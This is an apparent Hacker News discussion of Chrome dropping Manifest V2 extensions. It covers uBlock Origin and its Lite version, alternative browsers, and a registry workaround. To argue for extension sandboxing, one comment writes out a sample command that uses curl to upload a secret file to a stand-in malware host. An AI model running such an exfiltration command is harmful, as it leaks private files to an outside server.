I love my PiHole. I block more stuff than just ads with it. No problems with false positives in default setups. I went a bit nuts adding blocklists, personally (it's not necessary lmao; be judicious with what blocklists you add!) so sometimes run into something, but whitelisting things is really simple and I can't remember the last time I had to do it. My not-very-technical husband learned very quickly how to look in the query log to check if the PiHole is blocking something. He hasn't had to in ages. Temporarily disabling blocking is also super easy (simple, quick, effective escape hatch), and so is managing the various lists, so if my husband whitelists something from the query log and I want to refine it for some reason, I can without working hard. The configurability of blocking per configured group or client is amazing (and simple) as well; the video game consoles have separate rule sets than everything else which works super well for me.
Once again, I went stupid adding blocklists so the level of management previously required is kinda worst case-y and it is absolutely my own doing and since working through my idiocy it just works its magic without needing intervention. If you're more careful about not adding blocklists which say 'this will break things' (not hard) you'll be fine.
Id argue pihole is roughly equivalent to what you can do with manifest v3 based afld blockers. I use it as my primary ad blocker as well, and don't really understand why folks are upset about losing V2 that much. It seems like removing root in favor of more granular permissions which is generally a good thing.
I agree that more granular permissions is better (in terms of dictating which sites an extension has access to) but I think the main problem as I understand it is that this is an entirely seperate issue from the one that nukes uBO.
V3 introduces a hard limit on the total number network filters an extension is allowed to set and it's a laughably low number. Far below what uBO uses even on a barebones, default setup
> Users will be directed to the Chrome Web Store, where they will be recommended Manifest V3 alternatives for their disabled extension.
I'm curious about which extensions will be recommended to replace uBlock Origin after it's disabled. I'm sure those alternatives will see a surge in installs.
Also, why doesn't the creator of uBlock Origin update the V2 version to the V3 version? I know V3 version isn't as good as V2, but if you're developing that product, at least give your users something instead of leaving them with nothing. Otherwise, they may end up choosing poor alternatives.
This V3 version will be pushed as a regular update on the current V2 version before is disabled? I think that must be done now to avoid even the alerts on users.
If anyone has any guides or blogs related to migrating away from Chrome for a multi-decade user (thousands of bookmarks, saved pages/read later, etc.) I would sure be interested.
Every time I try to migrate my very large bookmark collection to another browser, it either misbehaves and partially loses some data or fails completely.
When the hell will firefox have a decent profile manager?? It's the one thing that is preventing me from switching over. No, container tabs are NOT it.
Darn, ublock also no longer works on Firefox for YouTube. At the beginning of each video there is one forced ad and sometimes the video stops for no reason.
I suppose they want everyone to stop using the Internet and read books.
Manifest V3 is not the problem itself. But removing webRequestBlocking and creating some ridiculous limits for the DNR api are, these changes should be reversed downstream.
What does this mean for browsers derived from chrome, like Arc? I heard they plan on continuing to support Manifest v2, but will ublock continue to be maintained for chrome?
MV2 code should remain well into 2025 since enterprises can still enable MV2 extensions. After that they may have to hard fork, which could become increasingly costly. Though they could coordinate to minimize duplicated efforts.
I read an article about Ublock Origin light. It claimed it couldn't do script injection and content blocking but I've written V3 extensions that do that though maybe what I'm thinking and what ublock origin does are different things. Does anyone know specific details or maybe a pointer to docs on what's not possible?
Are you aware of any that do this? I've been using pihole for years and have no complaints. I've only seen smart TVs seem to do this, although it's usually configurable.
One example that I was remembering was Chromecast. It needed Google DNS to work at all.
In general, though if an app sticks to "known good" DNS over HTTPS and pins its certificate to boot, it will bypass DNS-based adblocking very easily, and additionally will punish you by not working at all if you try to do any firewall/routing trickery.
I realize I'm about to post something that sounds like the most generic HN slop comments... but, considering it's why Mozilla initially made a whole new language in the first place, I hope most can look past what fanatics would normally say and focus on the scenario:
I was ecstatic about Ladybird from a "fun NIH project" perspective but once it became "serious" and had a cross-platform daily-driver long term focus it was quite the let down that the hot new independent kickstart was... still going to be built on C++ anyways. Even the Serenity ecosystem had started work on a NIH memory safe language - Jakt! I'm not going to say the "R" word (mostly because I'm less interested "which" and more interested in the "what") but the one place I'd really like to see memory safety is the new fresh-engined web browser written by a small team (or really, any team).
On that front https://servo.org/ is "alive" again under the Linux Foundation. It has a focus on being an easily embeddable engine and it seems to be picking up a bit of steam. Whether or not it really takes off remains to be seen. I'll be watching closely though!
My reason for learning Rust in the first place was trying to contribute to the servo engine. But then, Mozilla happened. My hope for servo continues, but it won't go anywhere if it stays in the limbo it has been in after Mozilla ditched it as a project. We need a real browser project, with a full UI/UX and everything, until people take it serious as a base to fork off.
The problem with reality is that almost all software is still built on C. Kernels, userspace APIs, libraries, everything. I just wish that we would've gotten something like C ABIs, but with memory safety and VM-to-VM communication in mind, e.g. for Rust and Go, along the way. WebASM / WASI somehow got there, at least in that direction. But it's never seen as a shared object or dll replacement, and always is just a compile target and nothing more - even when the potential is there.
Something like that would solve so many problems that all kinds of programming language are trying to solve by themselves, over and over again.
Your personal site is awesome by the way! Though I got too excited about the CV "challenge" until I read on GitHub it really is just a random password you hand out to people and not a "find the secret password somewhere and trigger its" somewhere :p.
Cookie invaders gave me a good shock too :D. As well as the random "bloop" sounds. 10/10
Well, shit... now I must resist the urge to go back and figure it out! I've got things to do this weekend, couldn't you have lied and said it wasn't really a challenge! ;)
Yeah when I built that I was way too deep in the steganographic rabbit hole. Might have to rework it at some point, because it needs a deep understanding of how to use statistical analysis to find a key/alphabet, and the frames that don't match the previous audio frame so that the codec skips them as corrupt frames. It was the year after 3301 so well...I kind of overdid it :D
Maybe something assembly related would be fun to do, too. These days I am reversing lots of malware, so sth like patching a binary so that it evolves into a different program similar to how APE does it would be a fun challenge, I guess :D
I wish some brave enough (no relation to Brave) soul patched Blink so it became possible to delegate URL blocking decisions to an external process via some sort of IPC. In goes a full URL and maybe an opaque session ID so some state may be tracked, out goes a boolean value. Assume all are allowed if this process cannot be connected to.
Seems unlikely with how many different ways ui elements are handles across an OS (including apps that do their own rendering). Though I bet you could block some subset of well known ones and block a lot of the network traffic that feeds ads.
V3 has some utterly/unnecessarily complicated shite going on, like offscreen documents, and I think it will get worse as time progresses. Google really needs some bludgeoning.
Ad blocker-wise I think the best argument is that internalising the traffic blocking can be made a lot more efficient than putting a javascript interpreter in between.
The counter argument is that ad-blocking is an arms-race and the only reason a subset of traffic blocking methods is going to work at all is because there isn't a big enough incentive yet.
Other than that the arguments in favour of V3 are going to be about the same as for any API update. My guess is a few extra APIs and more granular permissions.
The difference here is are you downloading a random dll from a well known source or from http://free-vpn-fast-internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't going to know the difference and will click the big green DOWNLOAD NOW button blindly.
Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.
A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.
Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.
So it's best to limit what the extension can do to begin with.
- People are afraid of plugins "in the wild". People need some kind of centralized, managed "extension store"
- People complains about store policy like Manifest V3
I don't think a single mechanism can please both crowds.
And what's worse? Google doesn't actually care about the security of the the "store". Scam extensions are everywhere. The "audit process" are minimal, customer/developer service are essentially none, and Google only enforce rules that affect their ads business.
Either from the "wild" internet or manifest v3 intranet.
Or can we do better? For example, a community can maintain an opensource "network control" DLL that allow users to enable/disable tamperscript-like firewall rules from uBlock or such.
If only Mozilla hadn't wasted all that time and money and created a Chrome-comparable in stability/performance and Vivaldi-comparable in customization, we could've have an easy way out of this current mess...
(v3 drops not only ad-blockers but also user style managers, so a significant degradation of the web interfaces)
Notably, Firefox is not removing v2 support (at least for now as of March 2024)
> Firefox, however, has no plans to deprecate MV2 and will continue to support MV2 extensions for the foreseeable future. And even if we re-evaluate this decision at some point down the road, we anticipate providing a notice of at least 12 months for developers to adjust accordingly and not feel rushed.[1]
[1]: https://blog.mozilla.org/addons/2024/03/13/manifest-v3-manif...
To my knowledge the “big” chrome engine alternatives aren’t either. I know that Vivaldi and Brave plan on keeping around v2 as long as it is economically feasible
Are you certain? The last I heard about it from Vivaldi[0], they were only going to keep the MV2 code around so long as it's in the upstream codebase:
> We will keep Manifest v2 for as long as it’s still available in Chromium. We expect to drop support in June 2025, but we may maintain it longer or be forced to drop support for it sooner, depending on the precise nature of the changes to the code.
Note that June 2025 is the same date Google plans to drop support completely[1].
[0] https://vivaldi.com/blog/manifest-v3-update-vivaldi-is-futur...
[1] https://developer.chrome.com/docs/extensions/develop/migrate...
Vivaldi team does not respond to any comments asking about ongoing v2 manifest support; safe to assume it's gone as soon as it's out of Chromium upstream. Given Tetzchner's continual messaging on how important user privacy is to Vivaldi it seems like a strange decision, but I don't know how much effort would be required to maintain the support. They're a small team, so it would be understandable if they would just say it's too hard, but instead they have avoided the topic entirely, which suggests they agree with the direction.
Or they just don't want to admit publicly that they're too small to maintain a fork when it diverges this much
Well Vivaldi is open source, right? Personally I would be reaching out to Brave, who already plans on maintaining V2 support, and see about a joint venture with a forked chromium.
Vivaldi is not open-source: https://vivaldi.com/blog/technology/why-isnt-vivaldi-browser...
> Even though our license doesn’t strictly allow this, we welcome it and we encourage users to share these code modifications on our forums.
lmao wtf
Ah. They can go fuck themselves then. I had assumed given the fact that the source was available.
c++ sources are available.
I was intensely interested in this, and after much reading, here's my best understanding:
Neither Brave nor Vivaldi are proposing to maintain engine support for v2: they both point to the codebase retaining support after Chrome drops support (likely for enterprise) as being the driver of their ability to offer v2. Both say that once those codepaths are removed, so too will v2 support be removed from Vivaldi and Brave.
No idea when Google will make that call.
Alright, so they’re both literally just useless wastes of man-hours then. Good to know.
But... what could possibly be the point of using a chromium based browser that is not Chrome, if not for MV2 support?
In case of Vivaldi, it's features like vertical tabs, and extreme customizability for the built-in stuff (for tabs alone the options dialog is like 3 pages of checkboxes for all the various aspects of how they behave).
Also for those who use cloud bookmark/history/tab sync, people might just not want Google specifically to have that data; Vivaldi does its own sync.
I use both Vivaldi, Brave and Firefox, all have their own strenghts. Brave now has built in vertical tabs as well: https://brave.com/blog/vertical-tabs/
MS Edge, Arc, and Sidekick have features Chrome doesn't such as split screen, side panels, and vertical tabs. Likewise for Firefox forks such as Zen.
None of those things are anything close to killer features much less reasons to switch. Verticle tabs, seriously?
Sorry that your personal use case doesn't match my use case and workflow. You keep using your tools and I'll keep using the ones I like.
Split screen done well would be a killer feature for me. Last time I looked Edge support was ok, but not great. But what kills Edge for me as a daily driver is the basic usability in managing bookmarks and tabs. It's stop and go for every basic operation like dragging objects while Firefox is simply a continuous flow. Firefox is invisible, Edge just gets in the way all the time.
Otherwise Edge is not bad at all. Chrome without MV2 is dead to me.
People spend a lot of time in the web browser. So yes, they want to have a comfortable experience with it. And those features are deal breakers for a lot of people. So stating that they are not killing features is just unreasonable at best and ignorant at worst.
> Verticle tabs, seriously
Yes, I use Edge due to its vertical tabs
It is all a gimmick but as long as people are switching to a chromium based browser and not Firefox I'm happy. With that said, I don't know how anyone would trust a small team to build them a secure and safe browser. Chrome is so battle tested at this point and Google puts a lot of resources in maintaining it, they stand to lose a lot more given their scale.
And so you throw in your lot with the strongest warlord on the block, and then they turn your shelter into a prison.
Customization. There are a lot of bad designs in the original Chrome that can be fixed in a fork
This sounds like Android phone manufacturers making fun of apple for removing the headphone jack and then doing it themselves a year later. Are they seriously going to maintain V2 support for a relatively small percentage of Powerusers which probably are mostly already using Firefox anyways? The point of being economically infeasible is probably in a month or so.
Firefox (and uBlock and BPC etc) works great on Andriod, but you have to disable Chrome to get Google apps to play nice.
I think it comes down to how aggressive Chrome will be at changing the internal APIs that it uses. They could choose to make it a very expensive patch to maintain. But I think they would have to go out of their way to do that.
Microsoft Edge announced the move to Manifest v3 back in 2020 and stopped accepting new code on v2 back in 2022...
https://learn.microsoft.com/en-us/microsoft-edge/extensions-...
That is easy talking as long as it is still a config flag, then after a compile-time flag. Once the internal APIs for MV2 or where MV2 get removed or changed it becomes very difficult to maintain. Never mind the possible security issues you introduce, but won’t get so quickly discovered.
Brave is an odd one. They've publicly stated[1] they plan to support parts of Manifest v2 for a handful of popular addons (uBlock Origin included) by making limited patches, but they make no promises.
It seems Shields was their main focus for MV3 mitigation, much like Vivaldi's now native content blocker made for the same reason (though Vivaldi has said[2] they won't be supporting MV2 past the last Chromium build that includes it).
[1] https://brave.com/blog/brave-shields-manifest-v3/
[2] https://vivaldi.com/blog/manifest-v3-update-vivaldi-is-futur...
Why use uBlock on Brave when Brave already blocks ads natively?
uBlock does have some things that are pretty unique, and useful outside of ads for some websites. Element Zapper is a good example. https://github.com/gorhill/ublock/wiki/Element-zapper
Does brave also block YouTube ads like ublock origin does?
Aren't these v2 extensions being removed from Chrome's store? If so, are the alternatives based on Chromium running their own store?
Yeah that's the problem. I used to be on Brave but having to download v2-only extensions[1] manually from each developer's website was a pain. I am on a Firefox-based browser now and extensions are synced across all my computers and it just works.
[1] while pre-existing v2 extensions are still on the store at least for now (e.g. https://chromewebstore.google.com/detail/ublock-origin/cjpal... ) newer ones haven't been able to be added to the store for a long time already, e.g. see https://libredirect.github.io/faq.html#chrome_web_store
I think the supermium chrome fork plans to keep V2 in.
Though it is less of an issue for those two, given that they have built-in adblocking. Still a laudable effort.
While adblocking has gotten most of the focus, it isn't the only functionality that is being limited or made more complicated. One of my favorite extensions is still not available for MV3 because of complications: https://github.com/openstyles/stylus/issues/1430
Yes, hence "less of an issue," not "not an issue."
At least when I last tested, Vivaldi on Android's adblocking is pretty far behind uBlock Origin -- it doesn't get nearly as many anti-adblock interstitials as it should.
At this point, I wonder why Firefox doesn't have a vivaldi-like tracker and ad block interface.
Perhaps it has to do with being a Google-funded browser.
I wonder how hard that would be to implement for someone who knew how to do it? Or if the code for that in vivaldi is open source?
It does. Click the little shield in the address bar. I assume it blocks some ads even if it's not as effective as uBlock Origin.
I guess I'll be moving my work browser across to firefox as well (moved personal across a year ago when these shenanigans started)
Along with that, I'd hope they'll add needed support for proper adblocking even with v3 and beyond
But they are removing adblock extensions that use v3
No they removed uBO Lite due to a misunderstanding/mistake and gorhill choose to not bother with Mozilla's annoying "review" process.
Recent and related:
Chrome Canary just killed uBlock Origin and other Manifest V2 extensions - https://news.ycombinator.com/item?id=41757178 - Oct 2024 (46 comments)
That one never made the frontpage, so I'm leaving the current thread up.
For people that have somehow missed the story, manifest v3 removed support for certain powerful network apis, severly limiting ad-blockers capabilities. uBlock Origin will not work anymore without manifest v2 (there's a v3 compatible lite version of uBlock Origin).
It's worth noting that the maintenance of the "lite" version is at some nonzero risk of burnout for its developers, ironically in part due to Mozilla being unnecessarily hostile: https://github.com/uBlockOrigin/uBOL-home/issues/197#issueco... discussed at https://news.ycombinator.com/item?id=41707418 - and while there's no plan yet to discontinue the Chrome MV3 compatible version, there are a million ways that this could go wrong.
My only long-term hope for this space is that a nonzero segment of congressional representatives have had ad blockers installed by their aides, realize that their experience online takes a nosedive when MV2 is discontinued, and calls for hearings! Blocking isn't just about not seeing ads, it's about a user's freedom to set up their "user agent" to preserve their privacy online from sites that don't respect their wishes. That's a right that Google is using its market power to erode, and it's not something we should take sitting down.
More on MV3 from a few years ago: https://www.eff.org/deeplinks/2021/12/chrome-users-beware-ma...
> It's worth noting that the maintenance of the "lite" version is at some nonzero risk of burnout for its developers, ironically in part due to Mozilla being unnecessarily hostile:
Why would you even use the lite version on firefox when the original works?
I'm doing all my banking in a separate Firefox profile where uBlock Origin Lite is the only installed extension. So there a zero extensions that have permission to access the pages or requests.
Of course I'm still using the normal uBlock Origin in my main browsing profile.
Seems safer to clone the source code and build the OG locally if banking security is that important.
Lite doesn't require any permissions.
Security and possibly performance, which is the selling point of MV3.
Yup, the MV3 version requires zero permissions and in theory should be faster. These are real benefits that for some reason nobody will admit exist.
Saying anything positive about MV3 or the lite extension seems to get you downvoted without explanation though, which is a nice example of how absurd this site is when it comes to anything related to Google.
Sometimes I think downvoting should require leaving a comment and reason, because I can't see any reason to downvote this other than "google bad".
I get the security benefits, but the performance benefits seem weak. Won't the benefits of not having to run as much js to do the filtering be cancelled out by having the run additional advertising code that isn't being blocked by the lobotomised adblockers?
Sounds like the real issue is "we are replacing X with Y" and there are use-cases for both X and Y to co-exist.
and just conveniently, X has some features that the owning company doesn't like as it is antithesis to their business model. Therefore, by replacing X with Y, and touting some performance improvements (which is real, but marginal), they get to remove X with plausible deniability.
They should let them co-exist but probably they figured out it is just easier to kill V2 extensions all together. What a shame.
Reason: Removing user control from browsers is strictly bad.
Which GOOG team are you on?
He is on Extensions team. lol
> nobody will admit exist.
This is not true.
People talk about the upside of the declarative API plenty, but adding one function doesn't mean removing another, and the conflation required to use that as a defense of google is what gets downvotes.
Is uBOL as ad-removing and privacy protecting as uBO?
We aren’t talking just an extension here. If it didn’t exist, that would make web browsing insufferable to many. It is a part of web browsing itself. Let me put it as clearly as it can be:
***
uBO is a Holy Grail and gorhill is our Jesus Christ.
***
If MV3 (and further development) tries to touch it in any inappropriate way, comments promoting it deserve 5x downvote mutiplier without the usual -4 limit.
"in theory" is not a real benefit
you get to downvote?
When you get Karma of 501 or more…
The "original" UBO is basically the mother of all supply chain vulnerabilities and whenever the inevitable exploit happens, everyone who thought they were a connoisseur of privacy is going to get completely pwned. UBO Lite works without being a gigantic security vuln.
The "original" Chrome is basically the mother of all supply chain vulnerabilities and whenever the inevitable exploitation happens, everyone who thought they were a connoisseur of security is going to get completely pwned.
Some people may think what you're saying is outlandish, but it's worth remembering that this is pretty much what already happened to Ublock (which led to the forking of Ublock Origin and return of gorehill)
Not saying it cannot happen, but in Firefox, it is a “Recommended“ extension which gets reviewed per release. A sophisticated attack could slip through, but a ham fisted takeover is unlikely.
It's also worth mentioning that Firefox doesn't force you to auto-update add-ons, but Chrome/Chromium do. (There was a hack workaround to keep Chromium from updating, but I forgot what it was or if it still works. It wasn't a trivial option in the browser itself like it should be.)
I use a certain extension. An update turned the extension into payware, locking 90% of the features behind a paywall. So I refuse to update it and instead continue to use the revision that still has all the original features. I would be absolutely incensed and outraged if my browser insisted on forcing me to update this extension!
Surely there are better ways for a developer to make money off of an existing extension without suddenly locking previously available functions behind a paywall. Perhaps instead paywall NEW features? Or ask for donations?
New features requires work. Donations require charity, which doesn't exist in the mind of someone who does that
> My only long-term hope for this space ...
Some of the anti-monopoly investigations of Google might achieve this too.
The removal of MV2 is extremely clearly Google abusing their dominant market position to line their pockets at the expense of their users.
When this goes through, there will be another EU anti-monopoly investigation just for this.
I think everywhere that you used “nonzero” you could have also not and it would have still made exactly the same point.
Normally this kind of thing isn’t said in good faith, but it’s actually a way my writing can improve and I appreciate the feedback!
To be honest, the reason I mentioned it at all was because I do the same thing with the same word so it was as much of a comment for your benefit as it was for my benefit haha.
I imagine the focus of the developers will very quickly shift to Lite once Chrome flips the switch and 95% of uBO's user base disappears overnight. It might not be what they want, but such events have their own dynamic.
95% of the user base going away just sounds like less support work for gorhill. This isn't a VC-backed startup or ad platform that needs users to survive.
Looks like FF got unlucky with a subcontractor that is "manually reviewing" extensions on the cheap
[dead]
I saw there is a manifest v3 ublock lite.
I don't understand why and how it would be less capable, and so far I have not read the details of how/why.
So far, it's just rumors to me.
I will keep using firefox anyway, but honestly I am still waiting for a clearer explanation.
You can't just call stuff you simply don't bother to look up "rumors".
Read up here:
https://github.com/uBlockOrigin/uBOL-home/wiki/Frequently-as...
With manifest v2, the extension could dynamically intercept requests and block them based on a custom rule.
With v3, extensions have to predefine the rules for blocking. Which is the limiting factor
That and certain features like the element zapper in uBO aren't available in Lite.
> extensions have to predefine the rules for blockin
And there's a limit of 5000 such rules.
The limit is 330000 rules:
"Based on input from the extension community, we also increased the number of rulesets for declarativeNetRequest, allowing extensions to bundle up to 330,000 static rules and dynamically add a further 30,000." https://blog.chromium.org/2024/05/manifest-v2-phase-out-begi....
even if it was infinite that wasn't really the issue, you can't express the algorithms uBlock Origin is using as a static list
Given the size and complexity of modern ad malware I doubt if 330,000 rules is enough, so why limit it?
So because you don't understand it, its rumors? A Simple google search would answer all of your questions in a literal sentence. It removes APIs used by ad blockers.
https://gprivate.com/6dp1q
"browsers using the ExtensionManifestV2Availability policy will be exempt from any browser changes until June 2025"
To extend ManifestV2 in Chrome, add the text below to a text file, saving and running it as a .reg will create and add a value of 2 to "ExtensionManifestV2Availability" in the HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
(When you open/run a .reg file, it updates your registry, usually preceeded by a warning.)
Alternatively, you could do this manually by pressing the Windows key, type "run" (without the quotes) and enter, type "regedit" (without the quotes) and enter, then navigate as far as you can to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome key
You may find there is no "Chrome" key and will need to create it, as well as creating ExtensionManifestV2Availability
--------------------------------------
Note that this will also disable Chrome’s DNS Over HTTPS as Chrome disables the DoH resolver by default when the browser is managed by enterprise policies like this one. See the platform-specific links mentioned on the uBlock Origin subreddit [1], many of which also include instructions for enabling the DoH resolver while managing the browser using policies.
[1]: https://old.reddit.com/r/uBlockOrigin/comments/1d49ud1/manif...
And IIRC including the quotes in a filename in a save dialog, líke "manifestv2.reg" (incl quotes), will save it with the extension you typed, so you won't end up with 'manifestv2.reg.txt'. So you skip a potentially otherwise needed rename step.
Wow, thanks for this tip. Saves the effort of having to manually find "all types" in the drop down... this is so much easier.
Also, just for clarification:
Apparently, the line Windows Registry Editor Version 5.00 is necessary at the beginning of the .reg file. This line indicates the format version for the registry file and tells Windows that it is compatible with the current registry editor (according to GPT). This worked for me.Save the file as:
Single command line (Run as Administrator-- you can do that from the Windows key-R dialog by holding CTRL-SHIFT and pressing ENTER):
What about Linux and Mac?
Link for Mac command
https://old.reddit.com/r/chrome/comments/1d799pa/tutorial_on...
[dead]
I've finally switched (back) to firefox today.
I switched from firefox to chrome for their superior devtools a few years back, but hopefully firefox has had time to catch up.
Everything old is new again!
This is why we need to break up Google.
Google is a de facto monopoly. They own the entire web. The gateway, the browser, the protocols, advertising, discovery.
Google is too big.
Sure, but we saw this coming a mile away (as in, people have been saying this about Chrome for about a decade). People--especially tech nerds--didn't have to switch to the closed source, conflict-of-interest, browser. But, everyone did, and this is what we get for it. We now have proprietary DRM built in to the web standards, and all kinds of other bullshit, because a bunch of people decided to not learn any lessons at all from Microsoft and Internet Explorer.
But, every time Mozilla does something slightly abrasive, HN users pile on about how Mozilla is ruining their privacy-respecting reputation, and then go back to using Chrome... The double-standard is really something else.
Maybe instead of getting someone else to break up Google for us, we could just... stop using their shit? I'm typing this from Firefox, I use Proton Mail (and pay for it!) for email, and I mostly search with DuckDuckGo (I know that's not perfect, either). I certainly don't feel like I'm living like a caveman...
/rant
> People--especially tech nerds--didn't have to switch to the closed source, conflict-of-interest, browser.
Do you not remember all the ads promoting chrome? First was chrome-frame IE extension, then came all the ads - then tie-ins where you got Chrome in addition when you really wanted some other app.
They pushed it hard because they knew they had no real competitors and could eat up marketshare.
Chrome won because it was more performant (read: only point of interest for Joe Average) and it was modern and cool (read: only point of interest for nerds).
Firefox failed because it stagnated on performance and code quality (read: memory leaks for daaaaaaaaays) and ultimately because Mozilla was corrupted by Mitchell Baker and still is to this very day driving away nerds and engineers by the truckload.
Lest we forget, Internet Explorer lost to Firefox despite bundling with Windows. Edge still loses to Chrome despite bundling with Windows. Safari despite bundling with iOS and MacOS only survives thanks to the Walls of Applestantinope holding against the SelEUk Empire's onslaught.
> Chrome won because it was more performant (read: only point of interest for Joe Average)
It's hard to argue chrome won on merit here when they were using their monopoly to actively sabotage users running firefox on the most popular sites.
> YouTube page load is 5x slower in Firefox and Edge than in Chrome because YouTube's Polymer redesign relies on the deprecated Shadow DOM v0 API only implemented in Chrome
Yeah that's last part is funny but pretty true. I had always used Safari (basically since they replaced Internet Explore for Mac with it) but it became much less performant and had many annoyances regression (like the favicons in bookmarks). Still, I kept using it but what make me switch to Chrome a few years ago (about 2) was a bug preventing proper password sync with my iPhone (acquired from a beta testing I believe, some got it successfully resolved by contacting support but I can't be arsed, they should just have a reset everything option, including their cloud thingy).
Hilariously since you can use Chrome password manager on iOS, it became a better solution overall than trying to stick with Apple mess. With it I got support for uBlock Origin (nothing is as good for Safari, and it came to a point where I just couldn't deal with the ads anymore) and a much faster/more modern browser. As a bonus, it syncs everything with my Windows installation much better and I can use my Chrome profile on other computers when I need to. But when uBlock Origin is not supported in Chrome anymore I'll probably revisit the choice for something else.
Apple has completely lost the plot, pushing their half-assed, barely work, cloud stuff while simultaneously raising the price of entry/maintenance of their hardware. This is why I laugh my ass choice when they brag about their privacy bullshit. If they have wanted, they could have very well figured out a sync without relying on any cloud stuff; instead, they push iCloud to make more money (it's a crutch for people with iPhones that have way too little storage and other proper computing device) even though it makes no sense for what was the philosophy of Apple software/hardware previously. They have no competitive advantage in this matter and it often just sucks or doesn't work properly.
Who's IBM now, right ?
Thanks for the unexpected laugh at the end. Maybe there is a typo in that imaginary world: "Applestantinople". But maybe it is as intended :)
I didn't even notice that. lmao
Google spent astronomical amounts of money advertising Chrome, including pushing Chrome from literally priceless Web real estate like the Google start page, bundling deals with e.g. Flash, and preinstalls on various desktops and laptops. It really is hard to say what would have happened without that advantage.
But it has been few years since Firefox got the Quantum update, and now much more memory efficient than Chrome.
Google made something better than what existed with Chrome, it was obvious it would capture the market significantly especially among more technical people.
I don't think the fact that Chrome is (was) better is the question, it's a question of how they got here.
Google took tons of money and threw it into Chrome and therefore developed something better. It's better because Google put more money into it than anyone else would have because, in the absence of considering using it to enshrine their search and ad revenue, it wouldn't make sense.
Isn't this part of the antitrust test?
It was only true that Chrome was significantly superior (performance-wise, anyway) for a little while. Firefox had to play catch up and it took several years. It was (mostly) called the "electrolysis" (a.k.a., "e10s") project. It was considered complete by 2018, and had already offered significant performance and stability improvements for years before then.
I wouldn't be surprised if Chrome still performs better on Google-owned web sites, for obvious reasons. But, nobody is really going to notice a difference between Firefox and Chrome when visiting, e.g., your bank's web site.
So, it's been somewhere between six and eight years that Firefox has had comparable performance, comparable web dev tools, and way cooler extensions. I'm sure plenty of people will reply that this isn't true and there was some website just this week that FORCES them to stay with Chrome because they noticed a jitter once, but people on the internet are top-tier experts at rationalizing and I don't buy it.
We could've all jumped on board with Firefox when the e10s project landed, but nobody did because it was just slightly less convenient to switch than to not. I hope it was worth it for them.
> I wouldn't be surprised if Chrome still performs better on Google-owned web sites, for obvious reasons.
Most websites (except for those doing some really fancy stuff with new experimental web apis) tend to work just fine in Firefox. Google's sites are the only ones I regularly encounter that perform terribly and leak memory continuously.
The one that is the worst for me is Google Cloud console. It takes tens of seconds to update page state when trying to create or edit resources in Firefox, especially anything in Compute Engine. Chrome feels reasonably snappy, at least as good as AWS's console. I'm not sure who is to blame for that but I use `chrome-new` to log into Google Cloud when I need to.
Chrome had better stability (not sure about performance) for nearly a decade - far more than "a little while". I gave Mozilla 3-4 years to catch up before finally switching to Chrome.
Even once e10s supposedly fixed their problems another 4 years down the road, I didn't see any reason to rush back. I've switched to another Chromium browser, but I'd rather try a new engine entirely like Ladybird than switch back to Mozilla, until they prove they're not going to let the browser stagnate for so long again.
This is the double standard I'm talking about. First, I honestly don't even believe your claim that Chrome was more stable than Firefox for a decade.
But, even so, you basically admit in the second paragraph that they're probably both fine, but you won't switch back to Mozilla "until they prove they're not going to let the browser stagnate for so long again." What the heck kind of test is that? And how long, exactly, will that take for you? If they "stagnated" for a decade, according to you, is it going to take another decade to prove they won't let it stagnate? Two decades, maybe? What does "stagnate" even mean? To me, it looks like Chrome is stagnating- what have they done lately that's innovative and actually good for users? Breaking a bunch of extensions and removing the ability to block ads? How many years does Chrome have to start behaving itself before you'll switch back to it after all of this? Ah, right- you won't switch away from it; you're probably only concerned about Firefox stagnating.
The truth is that you'll always make an excuse to not switch away from Chrome (and yeah, a browser that uses the Chromium guts is effectively the same thing when it comes to the monopoly on web standards).
Imagine browsing the web without an adblock. A single ad can consume 1GB in 5 minutes on my mobile phone. The CPU will be super slow. We often underestimate the loss of performance that ads represent.
Well, that’s going to be Chrome from now on.
I criticise Mozilla in tech circles, I recommend Firefox and a working adblocker to friends and family, and I donate to Ladybird. What else should I be doing?
That's it, I think. I think as long as enough of us actually do that, it'll make a difference. People seem to think that you need 50%+ of the users to "rebel" for there to be change, but the truth is that not all "users" are created equal. Developers, tech supporters (personal or professional), and "power users" matter more than typical users because it's our feedback, contributions, and demands that keep pushing these products forward. The "normies" will use whatever you put in front of them and they won't know or care that something could or should be different. If the nerds leave, the product will stagnate and other options will pick up steam.
unfortunately, there's not much else you get to do. With the exception of the anti-trust suits on google coming out with a decent outcome (which i wouldn't hold my breath for), there's little that individuals can do to push back against google's might.
If you're in a position of power in a corporation to dictate software usage, consider making firefox the default choice.
> tech nerds you would be surprised how many devs these days have drunk the big tech coolaid.
leetcode all the time and dream of working at google and using chrome and writing javascript.
if the tech nerds took a stand and used firefox en masse, we wouldn't have this problem.
unfortunately it is now normie season. we have to travel through these dark times.
There's still hope. I would like to draw a parallel to Microsoft Windows, with my own narrative added over.
Tech nerds mostly knew that Windows was not a good server operating system. It was also not a fantastic software development environment unless you were using a big, all-inclusive, IDE that was probably aimed specifically at developing Windows libraries and applications.
But, Windows was (and still is) the choice for normies by a WIDE margin.
The tech nerds continued to mostly ignore Windows for server stuff, and more and more ignored it for other dev stuff, too (many migrating to Macs, some to Linux, etc).
If you have a lot of users, but no developers on your platform, you're playing a dangerous game. Eventually Microsoft found a way to have Linux running in Windows. I don't know or care if that "saves" Microsoft or Windows or whatever, but I do see that as a win for the tech nerds.
All we have to do is get the tech nerds to stop using Chrome. Chrome can't survive forever if the nerds stop using Chrome, if we stop optimizing our web pages specifically for Chrome, and if we stop writing and maintaining extensions for it.
Eventually, they'll probably cave and put back more stuff to make the nerds happy, in order to bring them back to the platform and save their normie userbase. Either that or Chrome will die. Both are fine with me.
With the path Apple/Google are taking it looks like Microsoft will be the best bet for quite a while still. The thing with Microsoft is that while they lack taste and have some nasty corporate behavior, they are less greedy than the others and are willing to work with their customers more, respond to needs/demands better. Oh, and they don't try to have a captive hardware market, that is a massive plus.
The reason the "normies" "choose" Microsoft is because it's the only choice that make somewhat sense from a financial standpoint if you don't care that much. There is a whole mythology about Apple hardware lasting longer and all but, in my experience, the reverse is true and you get much more for your money if you opt for a standard computer that happens to come with Windows.
